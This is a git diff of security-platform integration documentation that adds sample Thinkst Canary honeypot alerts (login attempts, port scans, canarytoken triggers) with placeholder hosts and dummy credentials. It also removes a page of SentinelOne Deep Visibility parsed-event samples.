"incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "FTP Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "PASSWORD": "mypasswordverysecured", + "USERNAME": "jdoe", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "2000", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_git_repository_clone_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Git Repository Clone Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "HOST": "git.example.org", + "REPO": "mypreviousrepository", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "19001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_host_port_scan" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Host Port Scan", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "ports": "23,80,443", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "5002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_api_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP API Request", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "HEADERS": { + "Accept": "*/*", + "Host": "1111111111.example.org", + "User-Agent": "curl/8.7.1" + }, + "METHOD": "POST", + "PATH": "/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "POSTDATA": {}, + "RESPONSE": 200, + "HOSTNAME": "1111111111.example.org", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3005", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_canary_token" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684212", + "created_std": "2024-07-11 07:50:12 UTC+0000", + "description": "Canarytoken triggered", + "dst_host": "5.6.7.8", + "dst_port": 80, + "canarytoken": "xxxxxxxxxxxxxxxxxxxx", + "geoip": { + "city": "Emerainville", + "continent_code": "EU", + "country": "France", + "country_code": "FR", + "country_code3": "FRA", + "currency_code": "EUR", + "host_domain": "", + "hostname": "", + "ip": "1.2.3.4", + "is_bogon": false, + "is_v4_mapped": false, + "is_v6": false, + "latitude": 48.81276, + "longitude": 2.62139, + "region": "Ile-de-France", + "region_code": "J", + "timezone": { + "abbr": "CEST", + "date": "2024-07-11", + "id": "Europe/Paris", + "name": "Central European Summer Time", + "offset": "+02:00", + "time": "09:50:16.622847" + }, + "valid": true + }, + "headers": { + "Accept": "*/*", + "Host": "1111111111.example.org", + "User-Agent": "curl/8.7.1" + }, + "ip_blocklist": { + "is_proxy": false, + "is_tor": false, + "is_vpn": false + }, + "request_args": {}, + "timestamp": 1720684212, + "timestamp_std": "2024-07-11 07:50:12 UTC+0000", + "type": "http", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "local_time": "2024-07-11 07:50:12 (UTC)", + "logtype": "17000", + "matched_annotations": {}, + "memo": "Link to generate alert", + "name": "N/A", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_port": "0" + } + ``` + + + +=== "test_http_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "METHOD": "GET", + "CHANNEL": "TLS", + "PATH": "/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "RESPONSE": 200, + "USERNAME": "jdoe", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_page_load" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP Page Load", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "METHOD": "GET", + "CHANNEL": "TLS", + "PATH": "/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "RESPONSE": 200, + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3000", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_http_proxy_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "HTTP Proxy Request", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "URL": "https://example.org/path/to/a/secret/", + "USERAGENT": "curl/8.7.1", + "USERNAME": "jdoe", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "3001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_incident" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "incident", + "summary": "Canarytoken triggered", + "timestamp": "1720684212" + } + ``` + + + +=== "test_ldap_bind_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "LDAP Bind Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "DN": "uid=john.doe,ou=People,dc=example,dc=com", + "MECH": "GSSAPI", + "VER": "1.0.2", + "REQ": "request", + "TYPE": "PASSWORD", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "31001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_mongo_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Mongo Authentication Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "cmd": "insert", + "db": "mydatabase", + "user": "myuser", + "password": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "28002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_mssql_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "MSSQL Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "HOSTNAME": "mssql.example.com", + "APPNAME": "sqlcmd", + "USERNAME": "myuser", + "PASSWORD": "mysecuredpassword", + "SERVERNAME": "1.2.3.4", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "9001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_mysql_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "MYSQL Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "CLIENT_HASH": "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc", + "SALT": "18cebe27dc51ad8114db58ef50cf2915c66a1f94", + "USERNAME": "myuser", + "PASSWORD": "mysecuredpassword", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "8001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_shared_file_opened" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "Shared File Opened", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "USER": "jdoe", + "FILENAME": "myimportantfile", + "AUDITACTION": "pread", + "DOMAIN": "EXAMPLE", + "LOCALNAME": "hostname", + "MODE": "domain", + "OFFSET": 0, + "REMOTENAME": "CANARY", + "SHARENAME": "ImportantStuff", + "SIZE": 1800, + "STATUS": "OK", + "SMBARCH": "11", + "SMBVER": "1.0.0", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "5000", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_ssh_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "SSH Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "LOCALVERSION": "SSH-2.0-MS_1.100", + "PASSWORD": "mypasswordverysecured", + "REMOTEVERSION": "SSH-2.0-libssh2_1.10.1_DEV", + "USERNAME": "jdoe", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "4002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_tftp_request" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "TFTP Request", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "FILENAME": "accounting2024.pdf", + "OPCODE": "READ", + "MODE": "netascii", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "10001", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + +=== "test_winrm_login_attempt" + + + ```json + { + "incident_id": "incident:canarytoken:68b329da9893e34099c7d:1.2.3.4:1720684212", + "event_type": "event", + "acknowledged": "False", + "created": "1720684078", + "created_std": "2024-07-11 07:47:58 UTC+0000", + "description": "SSH Login Attempt", + "dst_host": "5.6.7.8", + "dst_host_public_ip": "", + "dst_port": "22", + "WORKSTATION": "desktop001", + "PASSWORD": "mypasswordverysecured", + "DOMAINNAME": "EXAMPLE", + "AUTHTYPE": "digest", + "USERNAME": "jdoe", + "timestamp": 1720684081, + "timestamp_std": "2024-07-11 07:48:01 UTC+0000", + "flock_id": "flock:default", + "flock_name": "Default Flock", + "ip_address": "", + "ippers": "", + "local_time": "2024-07-11 07:47:51", + "logtype": "4002", + "mac_address": "", + "matched_annotations": {}, + "name": "thinkst-canary", + "node_id": "xxxxxxxxxxxxxxxxxxxx", + "notified": "False", + "src_host": "1.2.3.4", + "src_host_reverse": "vm000000.example.org", + "src_port": "53804" + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md b/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md index 92fc16a02e..ecb78487e2 100644 --- a/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md +++ b/_shared_content/operations_center/integrations/generated/8a9894f8-d7bc-4c06-b96a-8808b3c6cade.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_conf_events.json" diff --git a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d.md b/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d.md deleted file mode 100644 index 2e64cb2ea8..0000000000 --- a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d.md +++ /dev/null @@ -1,3255 +0,0 @@ - -### Event Categories - - -The following table lists the data source offered by this integration. - -| Data Source | Description | -| ----------- | ------------------------------------ | -| `Network intrusion detection system` | SentinelOne Deep Visibility uses kernel based network monitoring to identify threats. | - - - - - - - - -### Transformed Events Samples after Ingestion - -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. - -=== "behavioral_indicators.json" - - ```json - - { - "message": "{\"meta\": {\"uuid\": \"f63008e522ce40c9afd4348634b5ab3b\", \"traceId\": \"01FFQB788MA7GG70KGC1DSQ6ZT\", \"agentVersion\": \"S1-WIN/21.7.1.240\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-TECH20\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, \"timestamp\": {\"millisecondsSinceEpoch\": \"1631797347671\"}, \"event_type\": \"behavioralIndicators\", \"source\": {\"node\": {\"key\": {\"value\": \"7DC20CD7D1BEDF9F\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=icon_reader --mojo-platform-channel-handle=30744 /prefetch:8\", \"fullPid\": {\"pid\": 19720, \"startTime\": {\"millisecondsSinceEpoch\": \"1631797347668\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"0D7A69B0C2C26E73\"}}, \"executable\": {\"node\": {\"key\": {\"value\": \"05893E5943D0005C\"}}, \"creationTime\": {\"millisecondsSinceEpoch\": \"1630573198477\"}, \"path\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"owner\": {}, \"isDir\": \"E_FALSE\", \"sizeBytes\": \"2465624\", \"signature\": {\"signed\": {\"identity\": \"GOOGLE LLC\", \"valid\": {}}}, \"hashes\": {\"sha1\": \"a82705f4f5d1408f7c14d16a9cbe26c509422b29\", \"sha256\": \"07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff\", \"md5\": \"a766188d75e570ea3f9b09fb9d82cb54\"}, \"fileLocation\": \"Local\"}, \"commandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"fullPid\": {\"pid\": 26188, \"startTime\": {\"millisecondsSinceEpoch\": \"1631516876708\"}}, \"user\": {\"name\": \"CORP\\\\user.name\", \"sid\": \"S-1-5-21-3542462677-1213864171-2030164332-6187\"}, \"interactive\": \"E_FALSE\", \"parent\": {\"node\": {\"key\": {\"value\": \"41CA3A862279A7BC\"}}, \"fullPid\": {\"startTime\": {}}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_TRUE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"MEDIUM\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"modelChildProcess\": 1804, \"osChildProcess\": 1804, \"crossProcess\": 590449, \"moduleLoad\": 2112, \"fileCreation\": 490788, \"fileDeletion\": 466017, \"fileModification\": 1403458, \"exeModification\": 1, \"netConnOut\": 12, \"registryModification\": 1847, \"crossProcessDupThreadHandle\": 5290, \"crossProcessDupProcessHandle\": 585159, \"dnsLookups\": 16}}, \"excluded\": \"E_FALSE\", \"name\": \"Google Chrome\", \"root\": \"E_FALSE\", \"subsystem\": \"SYS_WIN32\", \"sessionId\": 1, \"integrityLevel\": \"LOW\", \"isWow64\": \"E_FALSE\", \"isRedirectedCommandProcessor\": \"E_FALSE\", \"trueContext\": {\"key\": {\"value\": \"6B188EE5E8C5F24F\"}}, \"counters\": {\"moduleLoad\": 70, \"registryModification\": 1}}, \"indicator\": \"WD109\", \"metadata\": \"To Process[ Name: \\\"chrome.exe\\\", Pid: \\\"19720\\\", UID: \\\"7DC20CD7D1BEDF9F\\\", TrueContextID: \\\"6B188EE5E8C5F24F\\\", IntegrityLevel: \\\"Low\\\", RelationToSource: \\\"Child\\\" ], File Path: \\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"\", \"category\": \"BI_EVASION\", \"classification\": \"PUA\", \"description\": \"Code injection to other process memory space during the target process' initialization\", \"friendlyName\": \"PreloadInjection\", \"tactics\": [{\"name\": \"Defense Evasion\", \"source\": \"MITRE\", \"techniques\": [{\"name\": \"T1055.012\", \"link\": \"https://attack.mitre.org/techniques/T1055/012/\"}]}, {\"name\": \"Privilege Escalation\", \"source\": \"MITRE\", \"techniques\": [{\"name\": \"T1055.012\", \"link\": \"https://attack.mitre.org/techniques/T1055/012/\"}]}], \"longDescription\": \"Code injection to other process memory space during the target process' initialization MITRE: Defense Evasion {T1055.012}, Privilege Escalation {T1055.012}\"}", - "event": { - "action": "behavioralIndicators", - "start": "2021-09-16T13:02:27.671000Z" - }, - "agent": { - "version": "S1-WIN/21.7.1.240" - }, - "deepvisibility": { - "agent": { - "managment_url": "https://euce1-110-nfr.sentinelone.net", - "trace_id": "01FFQB788MA7GG70KGC1DSQ6ZT", - "uuid": "f63008e522ce40c9afd4348634b5ab3b" - }, - "event": { - "type": "behavioralIndicators" - }, - "host": { - "os": { - "revision": "19042" - } - }, - "indicator": { - "category": "BI_EVASION", - "classification": "PUA", - "description": "Code injection to other process memory space during the target process' initialization", - "id": "WD109", - "metadata": "To Process[ Name: \"chrome.exe\", Pid: \"19720\", UID: \"7DC20CD7D1BEDF9F\", TrueContextID: \"6B188EE5E8C5F24F\", IntegrityLevel: \"Low\", RelationToSource: \"Child\" ], File Path: \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "name": "PreloadInjection", - "tactics": [ - { - "name": "Defense Evasion", - "source": "MITRE", - "techniques": [ - { - "link": "https://attack.mitre.org/techniques/T1055/012/", - "name": "T1055.012" - } - ] - }, - { - "name": "Privilege Escalation", - "source": "MITRE", - "techniques": [ - { - "link": "https://attack.mitre.org/techniques/T1055/012/", - "name": "T1055.012" - } - ] - } - ] - }, - "process": { - "counters": { - "module_load": 70, - "registry_modification": 1 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "2021-09-02T08:59:58.477000Z" - }, - "family": "SYS_WIN32", - "integrity_level": "LOW", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "7DC20CD7D1BEDF9F" - }, - "parent": { - "counters": { - "cross_process": 590449, - "cross_process_dup_process_handle": 585159, - "cross_process_dup_thread_handle": 5290, - "dns_lookups": 16, - "file_creation": 490788, - "file_deletion": 466017, - "file_modification": 1403458, - "model_child_process": 1804, - "module_load": 2112, - "net_conn_out": 12, - "os_child_process": 1804, - "registry_modification": 1847 - }, - "excluded": "E_FALSE", - "executable": { - "is_dir": "E_FALSE", - "name": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "node": { - "key": "05893E5943D0005C" - }, - "signature": { - "signed": { - "identity": "GOOGLE LLC" - } - }, - "size_bytes": "2465624", - "start": "1630573198477" - }, - "family": "SYS_WIN32", - "integrity_level": "MEDIUM", - "interactive": "E_FALSE", - "is_redirected_command_processor": "E_FALSE", - "is_wow64": "E_FALSE", - "node": { - "key": "0D7A69B0C2C26E73" - }, - "parent": { - "node": { - "key": "41CA3A862279A7BC" - } - }, - "root": "E_TRUE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - }, - "root": "E_FALSE", - "session_id": 1, - "true_context": { - "key": "6B188EE5E8C5F24F" - }, - "user": { - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - } - } - }, - "host": { - "name": "LAPTOP-TECH20", - "os": { - "family": "windows", - "name": "Windows 10 Pro" - }, - "type": "laptop" - }, - "process": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=icon_reader --mojo-platform-channel-handle=30744 /prefetch:8", - "executable": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "parent": { - "command_line": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "hash": { - "md5": "a766188d75e570ea3f9b09fb9d82cb54", - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff" - }, - "name": "chrome.exe", - "pid": 26188, - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "pid": 19720, - "start": "2021-09-16T13:02:27.668000Z", - "title": "Google Chrome", - "working_directory": "C:\\Program Files\\Google\\Chrome\\Application" - }, - "related": { - "hash": [ - "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "a766188d75e570ea3f9b09fb9d82cb54", - "a82705f4f5d1408f7c14d16a9cbe26c509422b29" - ], - "user": [ - "CORP\\user.name" - ] - }, - "user": { - "id": "S-1-5-21-3542462677-1213864171-2030164332-6187", - "name": "CORP\\user.name" - } - } - - ``` - - -=== "event_dns.json" - - ```json - - { - "message": "{\"meta\": {\"seqId\": 35, \"uuid\": \"4d311e18709146cba8797a22e3c20762\", \"traceId\": \"BA1BE2835D6E4FF7B023C72DCE8B3829\", \"agentVersion\": \"S1-WIN/4.6.14.304\", \"osFamily\": \"windows\", \"osName\": \"Windows 10 Pro\", \"osRevision\": \"19042\", \"computerName\": \"LAPTOP-COM13\", \"machineType\": \"laptop\", \"mgmtUrl\": \"https://euce1-110-nfr.sentinelone.net\"}, 